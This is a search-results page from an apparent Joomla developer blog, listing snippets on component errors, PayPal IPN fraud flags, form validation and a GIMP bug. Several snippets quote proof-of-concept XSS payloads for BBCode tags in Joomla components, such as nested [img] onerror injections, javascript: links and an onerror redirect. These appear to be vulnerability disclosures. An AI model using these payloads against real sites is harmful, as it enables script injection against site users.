Search
1.
(Comments/All)
... class" error.
The solution I used was to jump into a controller file from the first component and run the secondary installs from in there.
Thanks again. ...
2.
(Code/Joomla!)
... = $this->getId();
if (empty($videoId) || $this->xmlContent == 'Invalid id') {
$this->setError(JText::_('CC INVALID VIDEO ID'));
return false;
}
if($this->xmlContent == false) ...
3.
(Code/Joomla!)
... that VirtueMart couldn't resolve as belonging to PayPal, and was rejecting the IPN notice as fraud. The notice I received from VirtueMart was:
Error code 506. Possible fraud. Error with REMOTE IP ADDRESS ...
4.
(Code/Joomla!)
... side-effect: sometimes the XML parser would produce an error about entities. I decided that, rather than parse the string and replace entities, I'd just dump the errors if they exist. Also, empty tags ...
5.
(Comments/All)
Jason,
This is probably due to a JavaScript error, which causes the AJAX submission to fail. This is generally caused by templates or modules loading jQuery without setting it in noConflict mode, although ...
6.
(Code/Joomla!)
...
XSS 1: Nested [img] Tags
[img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]
XSS 2: JavaScript links
[url=javascript:alert('xss');]http://google.com[/url]
Requires ...
7.
(Code/Joomla!)
... Tag XSS
[img]http://foo.com/fake.png"/onerror="alert(String.fromCharCode(88,83,83))[/img]
[size] BBCode [url] Tag XSS
[url="/onmouseover="alert(String.fromCharCode(88,83,83))]XSS[/url]
UPDATE: ...
8.
(Code/Joomla!)
... = "$pkgname successfully installed.";
}
else
{
$msgcolor = "#FFD0D0";
$msgtext = "ERROR: Could not install the $pkgname. Please install manually.";
}
?>
<table bgcolor="<?php ...
9.
(Other/Other)
... any other element, this would generally require at least some form of user interaction (mouse over, click, etc.), but the img tag has a special parameter: onerror. This allows you to execute scripts if ...
10.
(Code/Joomla!)
... XSS
Settings:
Allow BBCode - on (default)
Allow Pictures - on (not default)
[img]fake.png" onerror="alert(String.fromCharCode(88,83,83))[/img]
Website URL XSS
Settings:
Show web site ...
11.
(Code/Joomla!)
... was throwing a very strange error: 80004004.
As it turns out, the error was related to the code posted at the Sigsiu forums:
...
static $cheadChanged = false;
if( !$cheadChanged ) {
$cid = sobi2Config::request( ...
13.
(Code/Joomla!)
... {
alert( 'Please correct any errors before submission.' );
}
}
// our validation script
function doValidate( f )
{
if( document.formvalidator.isValid( f ) )
{
return ...
14.
(Code/PHP)
... caveats:
no spaces
no parentheses
no tags ( <> )
submission is only possible after the first preview
FF3 (limited, but redirection is possible):
!http://foo.com/fake.png"/onerror="location.href='http://google.com'!
Script ...
15.
(Code/Joomla!)
... [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]
Nested [url] XSS
[url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]
...
16.
(Code/Joomla!)
The Joomla component uddeIM is vulnerable to XSS injection in its BBCode implementation. Extra CSS parameters can be passed inside the [color] tag, and Internet Explorer versions before 8 will run scripts ...
17.
(Code/Joomla!)
... image, to trigger onerror event
there MUST be a space between the second opening [img] tag and the onerror
Without further ado, here's the (rather short) code:
[img]http://foo.com/fake.png [img] ...
18.
(Other/Other)
... like jQuery and Mootools handle all these for you, thus making JavaScript fun once again!
5. W3C Validators
Invalid code can cause some pretty bizarre errors to occur on a site. It's always a ...
19.
(Graphics/Graphics)
A while back I was playing around in the GIMP, and managed to find a bug of sorts in one of the rendering plugins. By running the plugin 4 or 5 times in direct succession using the keyboard shortcuts, ...
20.
(Other/Other)
Apparently, at a convenience store near my home in Fairmont, WV, food stamp beneficiaries can get just about anything they want. I'm pretty sure the designer didn't take into account black and white ...
Featured Extensions
|
$3.00
|
$10.00
$5.00 You Save: $5.00 |
$3.00
|
FREE
|



